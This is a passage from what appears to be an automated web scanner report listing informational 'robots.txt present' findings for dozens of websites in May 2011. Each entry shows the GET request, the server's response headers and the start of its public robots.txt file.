Disallow: /styles/
User-agent: *
Disallow: /xmlfiles/
User-agent: *
Disallow: /workarea/
User-agent: *
Disallo
...[SNIP]...
30.217. http://www.heartspring.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heartspring.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.heartspring.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:30:28 GMT
Server: Apache/2.2.15 (Unix) PHP/5.2.6 with Suhosin-Patch mod_ssl/2.2.15 OpenSSL/1.0.0d
Last-Modified: Tue, 24 Nov 2009 07:02:02 GMT
ETag: "90f3c7-17-4791884db8e80"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
30.218. http://www.hellobc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hellobc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hellobc.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 13 Feb 2011 18:43:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:48:29 GMT
Content-Length: 1096
Connection: close

#
# robots.txt for TBCCW/TBCDMS
#
# $Id: robots.txt,v 1.22 2003/01/14 20:23:04 ted Exp $
#

# exclude some access-controlled areas
User-agent: *
Disallow: /TBCCW/AuthFiles
Disallow: /TBCCW/Us
...[SNIP]...
30.219. http://www.hematologylibrary.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hematologylibrary.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hematologylibrary.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:59 GMT
Server: Apache/1.3.26 (Unix) DAV/1.0.3 ApacheJServ/1.1.2
Last-Modified: Fri, 04 Jun 2010 21:11:04 GMT
ETag: "1f-4a5-4c096be8"
Accept-Ranges: bytes
Content-Length: 1189
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-Delay: 10
Disallow: /accesslogs/
Disallow: /ads/
Disallow: /all.shtml
Disallow: /apps/
Disallow: /archive/
Disallow: /backtocs/
Disallow: /bmj/
Disallow: /browse-alt.shtml
Disallow
...[SNIP]...
30.220. http://www.herematures.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herematures.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.herematures.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.1
Date: Sun, 01 May 2011 23:02:29 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Mon, 19 Jul 2010 13:20:13 GMT
ETag: "d114eb-51-4c44510d"
Accept-Ranges: bytes
Content-Length: 81

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.herematures.com/sitemap.xml
30.221. http://www.heresquirt.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heresquirt.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.heresquirt.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.20
Date: Sun, 01 May 2011 23:48:08 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Fri, 20 Nov 2009 12:43:21 GMT
ETag: "1cc809a-50-4b068ee9"
Accept-Ranges: bytes
Content-Length: 80

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.heresquirt.com/sitemap.xml
30.222. http://www.herestuds.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herestuds.tv
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.herestuds.tv

Response

HTTP/1.1 200 OK
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:13:04 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Wed, 18 Nov 2009 12:15:40 GMT
ETag: "1498087-4e-4b03e56c"
Accept-Ranges: bytes
Content-Length: 78

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.herestuds.tv/sitemap.xml
30.223. http://www.herpesonline.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herpesonline.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.herpesonline.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:30:51 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 14 Aug 2008 00:00:00 GMT
ETag: "1048cdcb-45-454602fa86000"
Accept-Ranges: bytes
Content-Length: 69
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow:
30.224. http://www.hiddengalleries.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hiddengalleries.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hiddengalleries.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 01 May 2011 23:11:49 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 17 Jun 2008 18:01:50 GMT
ETag: "290023-26-44fe089cc9f80"
Accept-Ranges: bytes
Content-Length: 38

User-agent: *
Disallow: /cgi-bin/
30.225. http://www.highcharts.com/highslide/graphics/zoomout.cur  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.highcharts.com
Path:   /highslide/graphics/zoomout.cur

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.highcharts.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:46 GMT
Server: Apache/2.2.16
Last-Modified: Tue, 10 Nov 2009 17:20:37 GMT
ETag: "a9c5de3-130-47807874e4340"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...
30.226. http://www.highspeedinternet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.highspeedinternet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.highspeedinternet.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.5
Last-Modified: Mon, 11 Apr 2011 22:15:01 GMT
Accept-Ranges: bytes
Content-Length: 1841
Cache-Control: max-age=2592000
Expires: Tue, 31 May 2011 23:29:53 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
30.227. http://www.hittracker.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hittracker.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hittracker.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:15:32 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15
Last-Modified: Sat, 31 Oct 2009 10:41:14 GMT
ETag: "a8015cca-1c8-47738c8962680"
Accept-Ranges: bytes
Content-Length: 456
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /
Disallow: /cgi-bin/
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/plugins/
Disallow: /wp-content/cache/
Disallow: /wp-content/themes/
Disallow: /trackback/

...[SNIP]...
30.228. http://www.hlsm.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hlsm.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hlsm.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:10:48 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Thu, 12 Jan 2006 13:20:25 GMT
ETag: "9050f5f27a17c61:dc0"
Content-Length: 26

User-agent: *
Disallow: /
30.229. http://www.homebusinessconnection.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homebusinessconnection.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homebusinessconnection.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Sun, 01 May 2011 23:16:26 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-nbjnphkm=8C4A8A5DCD99746FDA7F7D45EB9E4183; path=/
Last-Modified: Fri, 09 Jul 2010 19:20:49 GMT
Content-Length: 23

User-agent: *
Allow: /
30.230. http://www.hot18teens.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hot18teens.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hot18teens.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 May 2011 00:09:16 GMT
Content-Type: text/plain
Content-Length: 36
Last-Modified: Sun, 16 Jan 2011 19:08:55 GMT
Connection: close
Accept-Ranges: bytes

User-agent: Baiduspider
Disallow: /
30.231. http://www.hotelgrandpacific.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelgrandpacific.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotelgrandpacific.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:01:48 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10 mod_ssl/2.8.31 OpenSSL/0.9.8g
Cache-Control: max-age=1209600
Expires: Sun, 15 May 2011 23:01:48 GMT
Last-Modified: Fri, 07 Jan 2011 23:50:40 GMT
ETag: "9f2154-637-4d27a6d0"
Accept-Ranges: bytes
Content-Length: 1591
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.7.2.3 2008/12/10 20:24:38 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...
30.232. http://www.hotspotshield.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotspotshield.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotspotshield.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:11:50 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 07 Sep 2010 22:04:26 GMT
ETag: "1d00290-37-48fb2948c0e80"
Accept-Ranges: bytes
Content-Length: 55
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /hotspot-shield-download.php
30.233. http://www.howitshouldhaveended.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howitshouldhaveended.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.howitshouldhaveended.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 30 Aug 2010 14:05:50 GMT
ETag: "505660-637-48f0af635ab80"
Accept-Ranges: bytes
Content-Length: 1591
Content-Type: text/plain
Date: Mon, 02 May 2011 00:09:25 GMT
Connection: close

# $Id: robots.txt,v 1.7.2.3 2008/12/10 20:24:38 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...
30.234. http://www.hudhouses.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hudhouses.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hudhouses.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:34 GMT
Server: Apache
Content-Language: en-US
P3P: CP="OTI DSP COR NID"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1

User-agent: Mediapartners-Google*
Disallow:


User-agent: *
Disallow: /listingdetails.html
Disallow: /property/
Disallow: /search.html
Disallow: /listing.html
Disallow: /bankruptcylaw.html
Disallow: /
...[SNIP]...
30.235. http://www.hyperhistory.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hyperhistory.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hyperhistory.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:40:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 17 Apr 2008 10:33:23 GMT
ETag: "31222f2-42f-44b0f29b282c0"
Accept-Ranges: bytes
Content-Length: 1071
Connection: close
Content-Type: text/plain

User-agent: DittoSpyder
Disallow: /

User-agent: psbot
Disallow: /

User-agent: MSIECrawler
Disallow: /

User-agent: Teleport
Disallow: /

User-agent: TeleportPro
Disallow: /

User-agen
...[SNIP]...
30.236. http://www.ibegin.com/weather/weather_widget.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:42:59 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 08 Oct 2010 14:12:24 GMT
ETag: "1400db-166-4921b99814200"
Accept-Ranges: bytes
Content-Length: 358
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /contact/
Disallow: /about/
Disallow: /blog/
Disallow: /weather/share
Disallow: /weather/xml
Disallow: /weather/removelocation.php
Disallow: /weather/setlocation.php
Disallow:
...[SNIP]...
30.237. http://www.icd9data.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.icd9data.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.icd9data.com

Response

HTTP/1.1 200 OK
Content-Length: 5842
Content-Type: text/plain
Last-Modified: Sat, 01 Jul 2006 12:42:32 GMT
Accept-Ranges: bytes
ETag: "fb2252d2b9dc61:70040"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:43:06 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/

User-agent: aipbot
Disallow: /

User-agent: ia_archiver
Disallow: /

User-agent: Alexibot
Disallow: /

User-agent: Aqua_Products
D
...[SNIP]...
30.238. http://www.icomamerica.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.icomamerica.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.icomamerica.com

Response

HTTP/1.1 200 OK
Content-Length: 266
Content-Type: text/plain
Content-Location: http://www.icomamerica.com/robots.txt
Last-Modified: Sat, 20 Jun 2009 05:24:03 GMT
ETag: "11f3335367f1c91:5897"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:54:32 GMT
Connection: close

# robots.txt for www.icomamerica.com

User-agent: *

# do not attempt to index includes files.
Disallow: /_admin/
Disallow: /_scripts/
Disallow: /controls/
Disallow: /css/
Disallow: /en/downl
...[SNIP]...
30.239. http://www.idealwifes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.idealwifes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.idealwifes.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:32 GMT
Server: Apache
Last-Modified: Wed, 21 Apr 2010 19:11:08 GMT
ETag: "e6962-83-4bcf4dcc"
Accept-Ranges: bytes
Content-Length: 131
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /tr/
Disallow: /?x=
Disallow: /count/
Allow: /pictures/
Sitemap: http://www.idealwifes.com/sitemap.xml
30.240. http://www.igl.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igl.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.igl.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:51 GMT
Server: Apache
Last-Modified: Mon, 21 Jun 2010 21:16:35 GMT
ETag: "4b5205-48-48990d1ccd2c0"
Accept-Ranges: bytes
Content-Length: 72
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-delay: 5
Disallow: /cgi-bin/
Disallow: /*/messages/
30.241. http://www.ilmeteo.it/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ilmeteo.it
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ilmeteo.it

Response

HTTP/1.1 200 OK
Server: Apache/2
Last-Modified: Wed, 19 Mar 2008 09:03:23 GMT
ETag: "68a30-4f-448c6866f2cc0"
Vary: Accept-Encoding
Content-Type: text/plain
X-Cacheable: YES
Content-Length: 79
Date: Mon, 02 May 2011 00:04:55 GMT
X-Varnish: 688515217 688508938
Age: 294
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 1

User-agent: Googlebot
Disallow: /index2.html
Disallow: /portale/index2.html
30.242. http://www.index.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.index.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.index.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:18 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) mod_gzip/1.3.26.1a mod_fastcgi/2.4.6 mod_throttle/3.1.2 Chili!Soft-ASP/3.6.2 FrontPage/5.0.2.2635 mod_perl/1.31 PHP/4.4.9
Vary: *
Last-Modified: Tue, 15 Feb 2005 19:24:52 GMT
ETag: "91c016-1500-42124c84"
Accept-Ranges: bytes
Content-Length: 5376
Connection: close
Content-Type: text/plain

# robots.txt
# Please, we do NOT allow non-se spiders any longer.

User-agent: BotRightHere
Disallow: /

User-agent: larbin
Disallow: /

User-agent: psbot
Disallow: /

User-agent: Python-urllib
Disall
...[SNIP]...
30.243. http://www.info.org.il/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.org.il
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.info.org.il

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:41:20 GMT
Server: Apache
Last-Modified: Thu, 25 Jun 2009 20:13:32 GMT
ETag: "1de8673-86-46d31db9a7300"
Accept-Ranges: bytes
Content-Length: 134
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /irrelevant/item_mail.php/

Disallow: /irrelevant/*.txt
Disallow: /irrelevant/item.php/109100457720509254
30.244. http://www.inosmi.ru/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inosmi.ru
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.inosmi.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 02 May 2011 00:00:20 GMT
Content-Type: text/plain
Connection: close
Content-Length: 130
Last-Modified: Tue, 20 Apr 2010 13:18:07 GMT
Accept-Ranges: bytes

##ACAP version=1.0

User-agent: *
Host: www.inosmi.ru
Disallow: *-print.html$

ACAP-crawler: *
ACAP-disallow-crawl: *-print.html$
30.245. http://www.iptv.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iptv.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iptv.org

Response

HTTP/1.1 200 OK
Content-Length: 680
Content-Type: text/plain
Content-Location: http://www.iptv.org/robots.txt
Last-Modified: Mon, 27 Dec 2010 15:15:11 GMT
Accept-Ranges: bytes
ETag: "1ef4b7dad8a5cb1:dfa"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:55:48 GMT
Connection: close

User-agent: *
Crawl-delay: 4
Request-rate: 1/4
Disallow: /email_2a_friend.cfm
Disallow: /contact.cfm
Disallow: /schedule.cfm
Disallow: /test/
Disallow: /danny/
Disallow: /css/
Disallow: /flas
...[SNIP]...
30.246. http://www.irishfest.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.irishfest.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.irishfest.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 05 Apr 2005 19:30:26 GMT
Accept-Ranges: bytes
ETag: "035ecea153ac51:41880"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:38:06 GMT
Content-Length: 96
Connection: close
Via: 1.1 AN-0003011043562112

User-agent: *
Disallow: /admin/
Disallow: /imgsrc/
Disallow: /Library/
Disallow: /Templates/
30.247. http://www.itracks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itracks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.itracks.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Aug 2010 15:28:39 GMT
Accept-Ranges: bytes
ETag: "7b586b7c35cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:13:25 GMT
Connection: close
Content-Length: 304

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...
30.248. http://www.jacksonnewspapers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jacksonnewspapers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jacksonnewspapers.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:16:32 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 167
Content-Type: text/plain;charset=utf-8
X-Cache: MISS from parent2.ghm.zope.net
X-Cache: MISS from cache6.ghm.zope.net
Via: 1.0 parent2.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache6.ghm.zope.net:80 (squid)
Connection: close


User-agent: Topix.net
Disallow: /
User-agent: *
Disallow: /mi-holland
User-agent: *
Disallow: /*?view
User-agent: *
Disallow: /!/
User-agent: *
Disallow: /promotions
30.249. http://www.jacksonsun.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jacksonsun.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jacksonsun.com

Response

HTTP/1.0 200 OK
Content-Length: 740
Content-Type: text/plain
Last-Modified: Mon, 01 Nov 2010 15:17:23 GMT
Accept-Ranges: bytes
ETag: "804331e2d779cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Date: Sun, 01 May 2011 23:55:32 GMT
Connection: close

# Robots.txt
# Be nice.
#
User-agent: MSIECrawler
Disallow: /
#
User-agent: *
Disallow: /apps/pbcs.dll/classifieds
Disallow: /apps/pbcs.dll/events
Disallow: /apps/pbcs.dll/index
Disallow: /a
...[SNIP]...
30.250. http://www.javaworld.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.javaworld.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.javaworld.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 02 May 2011 00:14:32 GMT
Cache-Control: max-age=600 ,public
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
ETag: "550fa3-3e3-48824a805df80"
Server: Apache/2.2.3 (CentOS)
Set-Cookie: Apache=173.193.214.243.1304295272740691; path=/; expires=Wed, 01-May-13 00:14:32 GMT
Last-Modified: Thu, 03 Jun 2010 18:48:46 GMT
Accept-Ranges: bytes
Content-Length: 995
Content-Type: text/plain; charset=UTF-8

# This robot.txt file should turn on ALL robots, crawlers and worms for visting
# ALL of your pages. The URL I extracted this from is at:
#
# http://info.webcrawler.com/mak/projects/robots/norobots
...[SNIP]...
30.251. http://www.jhoos.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jhoos.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jhoos.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "289175858"
Last-Modified: Wed, 24 Nov 2010 07:37:46 GMT
Content-Length: 26
Connection: close
Date: Sun, 01 May 2011 23:36:21 GMT
Server: lighttpd/1.4.28-devel-485M

User-agent: *
Disallow:

30.252. http://www.jmu.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jmu.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jmu.edu

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:08:55 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 12:34:35 GMT
Accept-Ranges: bytes
Content-Length: 2709
Connection: close
Content-Type: text/plain; charset=ISO-8859-1


# robots.txt for http://www.jmu.edu/

User-agent: *
Disallow: /cascadetest
Disallow: /catalog/94/ # 1994 catalog should not be indexed.
Disallow: /catalog/95/ # 1995 catalog sho
...[SNIP]...
30.253. http://www.jobsahoy.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jobsahoy.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jobsahoy.net

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:23:02 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 14:37:32 GMT
Accept-Ranges: bytes
Content-Length: 217
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt to block all bots except bots from Google , MSN , Yahoo
User-agent: Googlebot
Disallow:
User-agent: Slurp
Disallow:
User-agent: MSNBot
Disallow:
User-agent: ia_archiver
Disallow:
User-age
...[SNIP]...
30.254. http://www.journalstandard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.journalstandard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.journalstandard.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:41:55 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 167
Content-Type: text/plain;charset=utf-8
X-Cache: MISS from parent2.ghm.zope.net
X-Cache: MISS from cache2.ghm.zope.net
Via: 1.0 parent2.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache2.ghm.zope.net:80 (squid)
Vary: Accept-Encoding
Connection: close


User-agent: Topix.net
Disallow: /
User-agent: *
Disallow: /mi-holland
User-agent: *
Disallow: /*?view
User-agent: *
Disallow: /!/
User-agent: *
Disallow: /promotions
30.255. http://www.jpfun.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpfun.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jpfun.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:17 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 23 Jul 2010 13:27:10 GMT
ETag: "719890d-243-fdf50780"
Accept-Ranges: bytes
Content-Length: 579
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow: /download/
Disallow: /cgi-bin/
Disallow: /test/
Disallow: /ssi/
Disallow: /images/
Disallow: /js/
Disallow: /ads/
Disallow: /test.shtml
Disallow: /testing.s
...[SNIP]...
30.256. http://www.keds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
